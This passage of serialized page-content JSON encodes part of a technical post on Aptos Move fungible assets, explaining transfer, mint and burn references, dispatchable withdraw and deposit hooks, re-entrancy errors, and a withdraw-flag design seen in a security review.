,[72776],{"type":27,"tag":207,"props":72777,"children":72778},{"style":238},[72779],{"type":33,"value":10449},{"type":27,"tag":36,"props":72781,"children":72782},{},[72783,72784,72789,72790,72795],{"type":33,"value":23888},{"type":27,"tag":84,"props":72785,"children":72787},{"className":72786},[],[72788],{"type":33,"value":9262},{"type":33,"value":13740},{"type":27,"tag":84,"props":72791,"children":72793},{"className":72792},[],[72794],{"type":33,"value":72657},{"type":33,"value":72796}," is used to transfer object ownership:",{"type":27,"tag":101,"props":72798,"children":72800},{"className":10270,"code":72799,"language":10269,"meta":7,"style":7},"/// Used to create LinearTransferRef, hence ownership transfer.\nstruct TransferRef has drop, store {\n self: address,\n}\n",[72801],{"type":27,"tag":84,"props":72802,"children":72803},{"__ignoreMap":7},[72804,72812,72845,72864],{"type":27,"tag":207,"props":72805,"children":72806},{"class":209,"line":210},[72807],{"type":27,"tag":207,"props":72808,"children":72809},{"style":4647},[72810],{"type":33,"value":72811},"/// Used to create LinearTransferRef, hence ownership transfer.\n",{"type":27,"tag":207,"props":72813,"children":72814},{"class":209,"line":244},[72815,72819,72824,72828,72833,72837,72841],{"type":27,"tag":207,"props":72816,"children":72817},{"style":214},[72818],{"type":33,"value":16677},{"type":27,"tag":207,"props":72820,"children":72821},{"style":8920},[72822],{"type":33,"value":72823}," TransferRef",{"type":27,"tag":207,"props":72825,"children":72826},{"style":220},[72827],{"type":33,"value":16686},{"type":27,"tag":207,"props":72829,"children":72830},{"style":220},[72831],{"type":33,"value":72832}," drop",{"type":27,"tag":207,"props":72834,"children":72835},{"style":238},[72836],{"type":33,"value":1123},{"type":27,"tag":207,"props":72838,"children":72839},{"style":220},[72840],{"type":33,"value":13222},{"type":27,"tag":207,"props":72842,"children":72843},{"style":238},[72844],{"type":33,"value":384},{"type":27,"tag":207,"props":72846,"children":72847},{"class":209,"line":270},[72848,72852,72856,72860],{"type":27,"tag":207,"props":72849,"children":72850},{"style":214},[72851],{"type":33,"value":28058},{"type":27,"tag":207,"props":72853,"children":72854},{"style":226},[72855],{"type":33,"value":736},{"type":27,"tag":207,"props":72857,"children":72858},{"style":220},[72859],{"type":33,"value":13532},{"type":27,"tag":207,"props":72861,"children":72862},{"style":238},[72863],{"type":33,"value":1842},{"type":27,"tag":207,"props":72865,"children":72866},{"class":209,"line":296},[72867],{"type":27,"tag":207,"props":72868,"children":72869},{"style":238},[72870],{"type":33,"value":451},{"type":27,"tag":36,"props":72872,"children":72873},{},[72874,72876,72881],{"type":33,"value":72875},"While the fungible asset's ",{"type":27,"tag":84,"props":72877,"children":72879},{"className":72878},[],[72880],{"type":33,"value":72657},{"type":33,"value":72882}," manages the transfer of fungible assets and the (un)freezing of fungible stores:",{"type":27,"tag":101,"props":72884,"children":72886},{"className":10270,"code":72885,"language":10269,"meta":7,"style":7},"/// TransferRef can be used to allow or disallow the owner of fungible assets from transferring the asset\n/// and allow the holder of TransferRef to transfer fungible assets from any account.\nstruct TransferRef has drop, store {\n metadata: Object\u003CMetadata>\n}\n",[72887],{"type":27,"tag":84,"props":72888,"children":72889},{"__ignoreMap":7},[72890,72898,72906,72937,72964],{"type":27,"tag":207,"props":72891,"children":72892},{"class":209,"line":210},[72893],{"type":27,"tag":207,"props":72894,"children":72895},{"style":4647},[72896],{"type":33,"value":72897},"/// TransferRef can be used to allow or disallow the owner of fungible assets from transferring the asset\n",{"type":27,"tag":207,"props":72899,"children":72900},{"class":209,"line":244},[72901],{"type":27,"tag":207,"props":72902,"children":72903},{"style":4647},[72904],{"type":33,"value":72905},"/// and allow the holder of TransferRef to transfer fungible assets from any account.\n",{"type":27,"tag":207,"props":72907,"children":72908},{"class":209,"line":270},[72909,72913,72917,72921,72925,72929,72933],{"type":27,"tag":207,"props":72910,"children":72911},{"style":214},[72912],{"type":33,"value":16677},{"type":27,"tag":207,"props":72914,"children":72915},{"style":8920},[72916],{"type":33,"value":72823},{"type":27,"tag":207,"props":72918,"children":72919},{"style":220},[72920],{"type":33,"value":16686},{"type":27,"tag":207,"props":72922,"children":72923},{"style":220},[72924],{"type":33,"value":72832},{"type":27,"tag":207,"props":72926,"children":72927},{"style":238},[72928],{"type":33,"value":1123},{"type":27,"tag":207,"props":72930,"children":72931},{"style":220},[72932],{"type":33,"value":13222},{"type":27,"tag":207,"props":72934,"children":72935},{"style":238},[72936],{"type":33,"value":384},{"type":27,"tag":207,"props":72938,"children":72939},{"class":209,"line":296},[72940,72944,72948,72952,72956,72960],{"type":27,"tag":207,"props":72941,"children":72942},{"style":220},[72943],{"type":33,"value":68784},{"type":27,"tag":207,"props":72945,"children":72946},{"style":226},[72947],{"type":33,"value":736},{"type":27,"tag":207,"props":72949,"children":72950},{"style":8920},[72951],{"type":33,"value":68793},{"type":27,"tag":207,"props":72953,"children":72954},{"style":238},[72955],{"type":33,"value":9257},{"type":27,"tag":207,"props":72957,"children":72958},{"style":8920},[72959],{"type":33,"value":68802},{"type":27,"tag":207,"props":72961,"children":72962},{"style":238},[72963],{"type":33,"value":13274},{"type":27,"tag":207,"props":72965,"children":72966},{"class":209,"line":445},[72967],{"type":27,"tag":207,"props":72968,"children":72969},{"style":238},[72970],{"type":33,"value":451},{"type":27,"tag":36,"props":72972,"children":72973},{},[72974,72976,72982,72984,72990],{"type":33,"value":72975},"Additionally, there are fungible asset-specific references such as ",{"type":27,"tag":84,"props":72977,"children":72979},{"className":72978},[],[72980],{"type":33,"value":72981},"MintRef",{"type":33,"value":72983}," for minting and ",{"type":27,"tag":84,"props":72985,"children":72987},{"className":72986},[],[72988],{"type":33,"value":72989},"BurnRef",{"type":33,"value":72991}," for burning. These references are used exclusively by the fungible asset model, but they still must be created when the fungible asset object is initialized.",{"type":27,"tag":28,"props":72993,"children":72995},{"id":72994},"dispatchable-fungible-assets",[72996],{"type":33,"value":72997},"Dispatchable fungible assets",{"type":27,"tag":36,"props":72999,"children":73000},{},[73001],{"type":33,"value":73002},"Dispatchable fungible assets enhance the functionality of fungible assets by enabling the overloading of operations like deposits and withdrawals.",{"type":27,"tag":36,"props":73004,"children":73005},{},[73006],{"type":33,"value":73007},"Hooks registered during the creation of a dispatchable fungible asset override the default logic for these operations, allowing for custom features like access control, fee mechanisms, or granular pausing.",{"type":27,"tag":73009,"props":73010,"children":73011},"warning",{},[73012],{"type":27,"tag":36,"props":73013,"children":73014},{},[73015,73017,73023],{"type":33,"value":73016},"Overloading the core fungible asset functions introduces potential security risks; for example, during a deposit, funds may not end up at the intended address. The dispatchable fungible asset API provides functions like ",{"type":27,"tag":84,"props":73018,"children":73020},{"className":73019},[],[73021],{"type":33,"value":73022},"transfer_assert_minimum_deposit",{"type":33,"value":73024}," that can help mitigate such risks.",{"type":27,"tag":36,"props":73026,"children":73027},{},[73028,73030,73035,73037,73044],{"type":33,"value":73029},"Hook functions for dispatchable fungible assets must have the correct type signature. They must also be declared ",{"type":27,"tag":84,"props":73031,"children":73033},{"className":73032},[],[73034],{"type":33,"value":68907},{"type":33,"value":73036}," to ensure ",{"type":27,"tag":47,"props":73038,"children":73041},{"href":73039,"rel":73040},"https://aptos.dev/en/build/smart-contracts/book/package-upgrades#compatibility-rules",[51],[73042],{"type":33,"value":73043},"their signature remains immutable",{"type":33,"value":73045},". An example implementation might look like this:",{"type":27,"tag":101,"props":73047,"children":73049},{"className":10270,"code":73048,"language":10269,"meta":7,"style":7},"public fun withdraw_hook\u003CT: key>(\n store: Object\u003CT>,\n amount: u64,\n transfer_ref: &TransferRef,\n): FungibleAsset {\n //check paused, gather fees etc.\n fungible_asset::withdraw_with_ref(transfer_ref, store, amount)\n}\n\npublic fun deposit_hook\u003CT: key>(\n store: Object\u003CT>,\n fa: FungibleAsset,\n transfer_ref: &TransferRef,\n) {\n //check paused, gather fees etc.\n fungible_asset::deposit_with_ref(transfer_ref, store, fa);\n}\n",[73050],{"type":27,"tag":84,"props":73051,"children":73052},{"__ignoreMap":7},[73053,73089,73116,73135,73159,73178,73186,73232,73239,73246,73282,73309,73329,73352,73359,73366,73410],{"type":27,"tag":207,"props":73054,"children":73055},{"class":209,"line":210},[73056,73060,73064,73069,73073,73077,73081,73085],{"type":27,"tag":207,"props":73057,"children":73058},{"style":220},[73059],{"type":33,"value":68907},{"type":27,"tag":207,"props":73061,"children":73062},{"style":220},[73063],{"type":33,"value":13489},{"type":27,"tag":207,"props":73065,"children":73066},{"style":220},[73067],{"type":33,"value":73068}," withdraw_hook",{"type":27,"tag":207,"props":73070,"children":73071},{"style":238},[73072],{"type":33,"value":9257},{"type":27,"tag":207,"props":73074,"children":73075},{"style":8920},[73076],{"type":33,"value":13269},{"type":27,"tag":207,"props":73078,"children":73079},{"style":226},[73080],{"type":33,"value":736},{"type":27,"tag":207,"props":73082,"children":73083},{"style":220},[73084],{"type":33,"value":13213},{"type":27,"tag":207,"props":73086,"children":73087},{"style":238},[73088],{"type":33,"value":13870},{"type":27,"tag":207,"props":73090,"children":73091},{"class":209,"line":244},[73092,73096,73100,73104,73108,73112],{"type":27,"tag":207,"props":73093,"children":73094},{"style":220},[73095],{"type":33,"value":36676},{"type":27,"tag":207,"props":73097,"children":73098},{"style":226},[73099],{"type":33,"value":736},{"type":27,"tag":207,"props":73101,"children":73102},{"style":8920},[73103],{"type":33,"value":68793},{"type":27,"tag":207,"props":73105,"children":73106},{"style":238},[73107],{"type":33,"value":9257},{"type":27,"tag":207,"props":73109,"children":73110},{"style":8920},[73111],{"type":33,"value":13269},{"type":27,"tag":207,"props":73113,"children":73114},{"style":238},[73115],{"type":33,"value":13420},{"type":27,"tag":207,"props":73117,"children":73118},{"class":209,"line":270},[73119,73123,73127,73131],{"type":27,"tag":207,"props":73120,"children":73121},{"style":220},[73122],{"type":33,"value":68814},{"type":27,"tag":207,"props":73124,"children":73125},{"style":226},[73126],{"type":33,"value":736},{"type":27,"tag":207,"props":73128,"children":73129},{"style":8920},[73130],{"type":33,"value":13142},{"type":27,"tag":207,"props":73132,"children":73133},{"style":238},[73134],{"type":33,"value":1842},{"type":27,"tag":207,"props":73136,"children":73137},{"class":209,"line":296},[73138,73143,73147,73151,73155],{"type":27,"tag":207,"props":73139,"children":73140},{"style":220},[73141],{"type":33,"value":73142}," transfer_ref",{"type":27,"tag":207,"props":73144,"children":73145},{"style":226},[73146],{"type":33,"value":736},{"type":27,"tag":207,"props":73148,"children":73149},{"style":226},[73150],{"type":33,"value":14423},{"type":27,"tag":207,"props":73152,"children":73153},{"style":8920},[73154],{"type":33,"value":72657},{"type":27,"tag":207,"props":73156,"children":73157},{"style":238},[73158],{"type":33,"value":1842},{"type":27,"tag":207,"props":73160,"children":73161},{"class":209,"line":445},[73162,73166,73170,73174],{"type":27,"tag":207,"props":73163,"children":73164},{"style":238},[73165],{"type":33,"value":10416},{"type":27,"tag":207,"props":73167,"children":73168},{"style":226},[73169],{"type":33,"value":736},{"type":27,"tag":207,"props":73171,"children":73172},{"style":8920},[73173],{"type":33,"value":68772},{"type":27,"tag":207,"props":73175,"children":73176},{"style":238},[73177],{"type":33,"value":384},{"type":27,"tag":207,"props":73179,"children":73180},{"class":209,"line":867},[73181],{"type":27,"tag":207,"props":73182,"children":73183},{"style":4647},[73184],{"type":33,"value":73185}," //check paused, gather fees etc.\n",{"type":27,"tag":207,"props":73187,"children":73188},{"class":209,"line":892},[73189,73194,73198,73203,73207,73212,73216,73220,73224,73228],{"type":27,"tag":207,"props":73190,"children":73191},{"style":238},[73192],{"type":33,"value":73193}," fungible_asset",{"type":27,"tag":207,"props":73195,"children":73196},{"style":226},[73197],{"type":33,"value":10768},{"type":27,"tag":207,"props":73199,"children":73200},{"style":1335},[73201],{"type":33,"value":73202},"withdraw_with_ref",{"type":27,"tag":207,"props":73204,"children":73205},{"style":238},[73206],{"type":33,"value":1343},{"type":27,"tag":207,"props":73208,"children":73209},{"style":220},[73210],{"type":33,"value":73211},"transfer_ref",{"type":27,"tag":207,"props":73213,"children":73214},{"style":238},[73215],{"type":33,"value":1123},{"type":27,"tag":207,"props":73217,"children":73218},{"style":220},[73219],{"type":33,"value":13222},{"type":27,"tag":207,"props":73221,"children":73222},{"style":238},[73223],{"type":33,"value":1123},{"type":27,"tag":207,"props":73225,"children":73226},{"style":220},[73227],{"type":33,"value":27578},{"type":27,"tag":207,"props":73229,"children":73230},{"style":238},[73231],{"type":33,"value":10449},{"type":27,"tag":207,"props":73233,"children":73234},{"class":209,"line":1475},[73235],{"type":27,"tag":207,"props":73236,"children":73237},{"style":238},[73238],{"type":33,"value":451},{"type":27,"tag":207,"props":73240,"children":73241},{"class":209,"line":2065},[73242],{"type":27,"tag":207,"props":73243,"children":73244},{"emptyLinePlaceholder":19},[73245],{"type":33,"value":2062},{"type":27,"tag":207,"props":73247,"children":73248},{"class":209,"line":2092},[73249,73253,73257,73262,73266,73270,73274,73278],{"type":27,"tag":207,"props":73250,"children":73251},{"style":220},[73252],{"type":33,"value":68907},{"type":27,"tag":207,"props":73254,"children":73255},{"style":220},[73256],{"type":33,"value":13489},{"type":27,"tag":207,"props":73258,"children":73259},{"style":220},[73260],{"type":33,"value":73261}," deposit_hook",{"type":27,"tag":207,"props":73263,"children":73264},{"style":238},[73265],{"type":33,"value":9257},{"type":27,"tag":207,"props":73267,"children":73268},{"style":8920},[73269],{"type":33,"value":13269},{"type":27,"tag":207,"props":73271,"children":73272},{"style":226},[73273],{"type":33,"value":736},{"type":27,"tag":207,"props":73275,"children":73276},{"style":220},[73277],{"type":33,"value":13213},{"type":27,"tag":207,"props":73279,"children":73280},{"style":238},[73281],{"type":33,"value":13870},{"type":27,"tag":207,"props":73283,"children":73284},{"class":209,"line":2130},[73285,73289,73293,73297,73301,73305],{"type":27,"tag":207,"props":73286,"children":73287},{"style":220},[73288],{"type":33,"value":36676},{"type":27,"tag":207,"props":73290,"children":73291},{"style":226},[73292],{"type":33,"value":736},{"type":27,"tag":207,"props":73294,"children":73295},{"style":8920},[73296],{"type":33,"value":68793},{"type":27,"tag":207,"props":73298,"children":73299},{"style":238},[73300],{"type":33,"value":9257},{"type":27,"tag":207,"props":73302,"children":73303},{"style":8920},[73304],{"type":33,"value":13269},{"type":27,"tag":207,"props":73306,"children":73307},{"style":238},[73308],{"type":33,"value":13420},{"type":27,"tag":207,"props":73310,"children":73311},{"class":209,"line":2168},[73312,73317,73321,73325],{"type":27,"tag":207,"props":73313,"children":73314},{"style":220},[73315],{"type":33,"value":73316}," fa",{"type":27,"tag":207,"props":73318,"children":73319},{"style":226},[73320],{"type":33,"value":736},{"type":27,"tag":207,"props":73322,"children":73323},{"style":8920},[73324],{"type":33,"value":68772},{"type":27,"tag":207,"props":73326,"children":73327},{"style":238},[73328],{"type":33,"value":1842},{"type":27,"tag":207,"props":73330,"children":73331},{"class":209,"line":4095},[73332,73336,73340,73344,73348],{"type":27,"tag":207,"props":73333,"children":73334},{"style":220},[73335],{"type":33,"value":73142},{"type":27,"tag":207,"props":73337,"children":73338},{"style":226},[73339],{"type":33,"value":736},{"type":27,"tag":207,"props":73341,"children":73342},{"style":226},[73343],{"type":33,"value":14423},{"type":27,"tag":207,"props":73345,"children":73346},{"style":8920},[73347],{"type":33,"value":72657},{"type":27,"tag":207,"props":73349,"children":73350},{"style":238},[73351],{"type":33,"value":1842},{"type":27,"tag":207,"props":73353,"children":73354},{"class":209,"line":4103},[73355],{"type":27,"tag":207,"props":73356,"children":73357},{"style":238},[73358],{"type":33,"value":1424},{"type":27,"tag":207,"props":73360,"children":73361},{"class":209,"line":4154},[73362],{"type":27,"tag":207,"props":73363,"children":73364},{"style":4647},[73365],{"type":33,"value":73185},{"type":27,"tag":207,"props":73367,"children":73368},{"class":209,"line":4203},[73369,73373,73377,73382,73386,73390,73394,73398,73402,73406],{"type":27,"tag":207,"props":73370,"children":73371},{"style":238},[73372],{"type":33,"value":73193},{"type":27,"tag":207,"props":73374,"children":73375},{"style":226},[73376],{"type":33,"value":10768},{"type":27,"tag":207,"props":73378,"children":73379},{"style":1335},[73380],{"type":33,"value":73381},"deposit_with_ref",{"type":27,"tag":207,"props":73383,"children":73384},{"style":238},[73385],{"type":33,"value":1343},{"type":27,"tag":207,"props":73387,"children":73388},{"style":220},[73389],{"type":33,"value":73211},{"type":27,"tag":207,"props":73391,"children":73392},{"style":238},[73393],{"type":33,"value":1123},{"type":27,"tag":207,"props":73395,"children":73396},{"style":220},[73397],{"type":33,"value":13222},{"type":27,"tag":207,"props":73399,"children":73400},{"style":238},[73401],{"type":33,"value":1123},{"type":27,"tag":207,"props":73403,"children":73404},{"style":220},[73405],{"type":33,"value":68965},{"type":27,"tag":207,"props":73407,"children":73408},{"style":238},[73409],{"type":33,"value":1455},{"type":27,"tag":207,"props":73411,"children":73412},{"class":209,"line":4249},[73413],{"type":27,"tag":207,"props":73414,"children":73415},{"style":238},[73416],{"type":33,"value":451},{"type":27,"tag":73418,"props":73419,"children":73420},"question",{},[73421,73448],{"type":27,"tag":36,"props":73422,"children":73423},{},[73424,73426,73432,73434,73440,73441,73447],{"type":33,"value":73425},"Why hook functions rely on ",{"type":27,"tag":84,"props":73427,"children":73429},{"className":73428},[],[73430],{"type":33,"value":73431},"*_with_ref",{"type":33,"value":73433}," calls? What would happen if the hook function called ",{"type":27,"tag":84,"props":73435,"children":73437},{"className":73436},[],[73438],{"type":33,"value":73439},"dispatchable_fungible_asset::withdraw",{"type":33,"value":24068},{"type":27,"tag":84,"props":73442,"children":73444},{"className":73443},[],[73445],{"type":33,"value":73446},"fungible_asset::withdraw_with_ref",{"type":33,"value":10444},{"type":27,"tag":73449,"props":73450,"children":73451},"template",{"v-slot:answer-0":7},[73452,73464],{"type":27,"tag":36,"props":73453,"children":73454},{},[73455,73457,73462],{"type":33,"value":73456},"A1: Hook functions rely on ",{"type":27,"tag":84,"props":73458,"children":73460},{"className":73459},[],[73461],{"type":33,"value":73431},{"type":33,"value":73463}," calls because the default fungible asset functions verify if the fungible asset is not dispatchable.",{"type":27,"tag":36,"props":73465,"children":73466},{},[73467,73469,73474],{"type":33,"value":73468},"A2: A ",{"type":27,"tag":84,"props":73470,"children":73472},{"className":73471},[],[73473],{"type":33,"value":73439},{"type":33,"value":73475}," would result in RUNTIME_DISPATCH_ERROR (code 4037) error with error message: \"Re-entrancy detected\".",{"type":27,"tag":36,"props":73477,"children":73478},{},[73479],{"type":33,"value":73480},"In one of our reviews, we encountered a dispatchable fungible asset where the hooked withdrawal set a \"blocked\" flag, which was cleared by the corresponding deposit. This design was used to ensure that each withdrawal was tied to a deposit, effectively preventing simultaneous withdrawals.",{"type":27,"tag":101,"props":73482,"children":73484},{"className":10270,"code":73483,"language":10269,"meta":7,"style":7},"public fun deposit\u003CT: key>(store: Object\u003CT>, fa: FungibleAsset, transfer_ref: &TransferRef) {\n assert_withdraw_flag(true);\n [...]\n set_withdraw_flag(false);\n fungible_asset::deposit_with_ref(transfer_ref, store, amount);\n [...]\n }\n\npublic fun withdraw\u003CT: key>(store: Object\u003CT>, amount: u64, transfer_ref: &TransferRef): FungibleAsset acquires [...] {\n assert_withdraw_flag(false);\n [...]\n set_withdraw_flag(true);\n fungible_asset::withdraw_with_ref(transfer_ref, store, amount)\n}\n",[73485],{"type":27,"tag":84,"props":73486,"children":73487},{"__ignoreMap":7},[73488,73583,73603,73618,73638,73681,73696,73703,73710,73829,73848,73863,73882,73925],{"type":27,"tag":207,"props":73489,"children":73490},{"class":209,"line":210},[73491,73495,73499,73503,73507,73511,73515,73519,73523,73527,73531,73535,73539,73543,73547,73551,73555,73559,73563,73567,73571,73575,73579],{"type":27,"tag":207,"props":73492,"children":73493},{"style":220},[73494],{"type":33,"value":68907},{"type":27,"tag":207,"props":73496,"children":73497},{"style":220},[73498],{"type":33,"value":13489},{"type":27,"tag":207,"props":73500,"children":73501},{"style":220},[73502],{"type":33,"value":68916},{"type":27,"tag":207,"props":73504,"children":73505},{"style":238},[73506],{"type":33,"value":9257},{"type":27,"tag":207,"props":73508,"children":73509},{"style":8920},[73510],{"type":33,"value":13269},{"type":27,"tag":207,"props":73512,"children":73513},{"style":226},[73514],{"type":33,"value":736},{"type":27,"tag":207,"props":73516,"children":73517},{"style":220},[73518],{"type":33,"value":13213},{"type":27,"tag":207,"props":73520,"children":73521},{"style":238},[73522],{"type":33,"value":14893},{"type":27,"tag":207,"props":73524,"children":73525},{"style":220},[73526],{"type":33,"value":13222},{"type":27,"tag":207,"props":73528,"children":73529},{"style":226},[73530],{"type":33,"value":736},{"type":27,"tag":207,"props":73532,"children":73533},{"style":8920},[73534],{"type":33,"value":68793},{"type":27,"tag":207,"props":73536,"children":73537},{"style":238},[73538],{"type":33,"value":9257},{"type":27,"tag":207,"props":73540,"children":73541},{"style":8920},[73542],{"type":33,"value":13269},{"type":27,"tag":207,"props":73544,"children":73545},{"style":238},[73546],{"type":33,"value":13912},{"type":27,"tag":207,"props":73548,"children":73549},{"style":220},[73550],{"type":33,"value":68965},{"type":27,"tag":207,"props":73552,"children":73553},{"style":226},[73554],{"type":33,"value":736},{"type":27,"tag":207,"props":73556,"children":73557},{"style":8920},[73558],{"type":33,"value":68772},{"type":27,"tag":207,"props":73560,"children":73561},{"style":238},[73562],{"type":33,"value":1123},{"type":27,"tag":207,"props":73564,"children":73565},{"style":220},[73566],{"type":33,"value":73211},{"type":27,"tag":207,"props":73568,"children":73569},{"style":226},[73570],{"type":33,"value":736},{"type":27,"tag":207,"props":73572,"children":73573},{"style":226},[73574],{"type":33,"value":14423},{"type":27,"tag":207,"props":73576,"children":73577},{"style":8920},[73578],{"type":33,"value":72657},{"type":27,"tag":207,"props":73580,"children":73581},{"style":238},[73582],{"type":33,"value":1424},{"type":27,"tag":207,"props":73584,"children":73585},{"class":209,"line":244},[73586,73591,73595,73599],{"type":27,"tag":207,"props":73587,"children":73588},{"style":1335},[73589],{"type":33,"value":73590}," assert_withdraw_flag",{"type":27,"tag":207,"props":73592,"children":73593},{"style":238},[73594],{"type":33,"value":1343},{"type":27,"tag":207,"props":73596,"children":73597},{"style":214},[73598],{"type":33,"value":11278},{"type":27,"tag":207,"props":73600,"children":73601},{"style":238},[73602],{"type":33,"value":1455},{"type":27,"tag":207,"props":73604,"children":73605},{"class":209,"line":270},[73606,73610,73614],{"type":27,"tag":207,"props":73607,"children":73608},{"style":238},[73609],{"type":33,"value":69950},{"type":27,"tag":207,"props":73611,"children":73612},{"style":226},[73613],{"type":33,"value":16867},{"type":27,"tag":207,"props":73615,"children":73616},{"style":238},[73617],{"type":33,"value":19050},{"type":27,"tag":207,"props":73619,"children":73620},{"class":209,"line":296},[73621,73626,73630,73634],{"type":27,"tag":207,"props":73622,"children":73623},{"style":1335},[73624],{"type":33,"value":73625}," set_withdraw_flag",{"type":27,"tag":207,"props":73627,"children":73628},{"style":238},[73629],{"type":33,"value":1343},{"type":27,"tag":207,"props":73631,"children":73632},{"style":214},[73633],{"type":33,"value":15456},{"type":27,"tag":207,"props":73635,"children":73636},{"style":238},[73637],{"type":33,"value":1455},{"type":27,"tag":207,"props":73639,"children":73640},{"class":209,"line":445},[73641,73645,73649,73653,73657,73661,73665,73669,73673,73677],{"type":27,"tag":207,"props":73642,"children":73643},{"style":238},[73644],{"type":33,"value":73193},{"type":27,"tag":207,"props":73646,"children":73647},{"style":226},[73648],{"type":33,"value":10768},{"type":27,"tag":207,"props":73650,"children":73651},{"style":1335},[73652],{"type":33,"value":73381},{"type":27,"tag":207,"props":73654,"children":73655},{"style":238},[73656],{"type":33,"value":1343},{"type":27,"tag":207,"props":73658,"children":73659},{"style":220},[73660],{"type":33,"value":73211},{"type":27,"tag":207,"props":73662,"children":73663},{"style":238},[73664],{"type":33,"value":1123},{"type":27,"tag":207,"props":73666,"children":73667},{"style":220},[73668],{"type":33,"value":13222},{"type":27,"tag":207,"props":73670,"children":73671},{"style":238},[73672],{"type":33,"value":1123},{"type":27,"tag":207,"props":73674,"children":73675},{"style":220},[73676],{"type":33,"value":27578},{"type":27,"tag":207,"props":73678,"children":73679},{"style":238},[73680],{"type":33,"value":1455},{"type":27,"tag":207,"props":73682,"children":73683},{"class":209,"line":867},[73684,73688,73692],{"type":27,"tag":207,"props":73685,"children":73686},{"style":238},[73687],{"type":33,"value":69950},{"type":27,"tag":207,"props":73689,"children":73690},{"style":226},[73691],{"type":33,"value":16867},{"type":27,"tag":207,"props":73693,"children":73694},{"style":238},[73695],{"type":33,"value":19050},{"type":27,"tag":207,"props":73697,"children":73698},{"class":209,"line":892},[73699],{"type":27,"tag":207,"props":73700,"children":73701},{"style":238},[73702],{"type":33,"value":10645},{"type":27,"tag":207,"props":73704,"children":73705},{"class":209,"line":1475},[73706],{"type":27,"tag":207,"props":73707,"children":73708},{"emptyLinePlaceholder":19},[73709],{"type":33,"value":2062},{"type":27,"tag":207,"props":73711,"children":73712},{"class":209,"line":2065},[73713,73717,73721,73725,73729,73733,73737,73741,73745,73749,73753,73757,73761,73765,73769,73773,73777,73781,73785,73789,73793,73797,73801,73805,73809,73813,73817,73821,73825],{"type":27,"tag":207,"props":73714,"children":73715},{"style":220},[73716],{"type":33,"value":68907},{"type":27,"tag":207,"props":73718,"children":73719},{"style":220},[73720],{"type":33,"value":13489},{"type":27,"tag":207,"props":73722,"children":73723},{"style":220},[73724],{"type":33,"value":27543},{"type":27,"tag":207,"props":73726,"children":73727},{"style":238},[73728],{"type":33,"value":9257},{"type":27,"tag":207,"props":73730,"children":73731},{"style":8920},[73732],{"type":33,"value":13269},{"type":27,"tag":207,"props":73734,"children":73735},{"style":226},[73736],{"type":33,"value":736},{"type":27,"tag":207,"props":73738,"children":73739},{"style":220},[73740],{"type":33,"value":13213},{"type":27,"tag":207,"props":73742,"children":73743},{"style":238},[73744],{"type":33,"value":14893},{"type":27,"tag":207,"props":73746,"children":73747},{"style":220},[73748],{"type":33,"value":13222},{"type":27,"tag":207,"props":73750,"children":73751},{"style":226},[73752],{"type":33,"value":736},{"type":27,"tag":207,"props":73754,"children":73755},{"style":8920},[73756],{"type":33,"value":68793},{"type":27,"tag":207,"props":73758,"children":73759},{"style":238},[73760],{"type":33,"value":9257},{"type":27,"tag":207,"props":73762,"children":73763},{"style":8920},[73764],{"type":33,"value":13269},{"type":27,"tag":207,"props":73766,"children":73767},{"style":238},[73768],{"type":33,"value":13912},{"type":27,"tag":207,"props":73770,"children":73771},{"style":220},[73772],{"type":33,"value":27578},{"type":27,"tag":207,"props":73774,"children":73775},{"style":226},[73776],{"type":33,"value":736},{"type":27,"tag":207,"props":73778,"children":73779},{"style":8920},[73780],{"type":33,"value":13142},{"type":27,"tag":207,"props":73782,"children":73783},{"style":238},[73784],{"type":33,"value":1123},{"type":27,"tag":207,"props":73786,"children":73787},{"style":220},[73788],{"type":33,"value":73211},{"type":27,"tag":207,"props":73790,"children":73791},{"style":226},[73792],{"type":33,"value":736},{"type":27,"tag":207,"props":73794,"children":73795},{"style":226},[73796],{"type":33,"value":14423},{"type":27,"tag":207,"props":73798,"children":73799},{"style":8920},[73800],{"type":33,"value":72657},{"type":27,"tag":207,"props":73802,"children":73803},{"style":238},[73804],{"type":33,"value":10416},{"type":27,"tag":207,"props":73806,"children":73807},{"style":226},[73808],{"type":33,"value":736},{"type":27,"tag":207,"props":73810,"children":73811},{"style":8920},[73812],{"type":33,"value":68772},{"type":27,"tag":207,"props":73814,"children":73815},{"style":220},[73816],{"type":33,"value":14849},{"type":27,"tag":207,"props":73818,"children":73819},{"style":238},[73820],{"type":33,"value":30305},{"type":27,"tag":207,"props":73822,"children":73823},{"style":226},[73824],{"type":33,"value":16867},{"type":27,"tag":207,"props":73826,"children":73827},{"style":238},[73828],{"type":33,"value":68998},{"type":27,"tag":207,"props":73830,"children":73831},{"class":209,"line":2092},[73832,73836,73840,73844],{"type":27,"tag":207,"props":73833,"children":73834},{"style":1335},[73835],{"type":33,"value":73590},{"type":27,"tag":207,"props":73837,"children":73838},{"style":238},[73839],{"type":33,"value":1343},{"type":27,"tag":207,"props":73841,"children":73842},{"style":214},[73843],{"type":33,"value":15456},{"type":27,"tag":207,"props":73845,"children":73846},{"style":238},[73847],{"type":33,"value":1455},{"type":27,"tag":207,"props":73849,"children":73850},{"class":209,"line":2130},[73851,73855,73859],{"type":27,"tag":207,"props":73852,"children":73853},{"style":238},[73854],{"type":33,"value":69950},{"type":27,"tag":207,"props":73856,"children":73857},{"style":226},[73858],{"type":33,"value":16867},{"type":27,"tag":207,"props":73860,"children":73861},{"style":238},[73862],{"type":33,"value":19050},{"type":27,"tag":207,"props":73864,"children":73865},{"class":209,"line":2168},[73866,73870,73874,73878],{"type":27,"tag":207,"props":73867,"children":73868},{"style":1335},[73869],{"type":33,"value":73625},{"type":27,"tag":207,"props":73871,"children":73872},{"style":238},[73873],{"type":33,"value":1343},{"type":27,"tag":207,"props":73875,"children":73876},{"style":214},[73877],{"type":33,"value":11278},{"type":27,"tag":207,"props":73879,"children":73880},{"style":238},[73881],{"type":33,"value":1455},{"type":27,"tag":207,"props":73883,"children":73884},{"class":209,"line":4095},[73885,73889,73893,73897,73901,73905,73909,73913,73917,73921],{"type":27,"tag":207,"props":73886,"children":73887},{"style":238},[73888],{"type":33,"value":73193},{"type":27,"tag":207,"props":73890,"children":73891},{"style":226},[73892],{"type":33,"value":10768},{"type":27,"tag":207,"props":73894,"children":73895},{"style":1335},[73896],{"type":33,"value":73202},{"type":27,"tag":207,"props":73898,"children":73899},{"style":238},[73900],{"type":33,"value":1343},{"type":27,"tag":207,"props":73902,"children":73903},{"style":220},[73904],{"type":33,"value":73211},{"type":27,"tag":207,"props":73906,"children":73907},{"style":238},[73908],{"type":33,"value":1123},{"type":27,"tag":207,"props":73910,"children":73911},{"style":220},[73912],{"type":33,"value":13222},{"type":27,"tag":207,"props":73914,"children":73915},{"s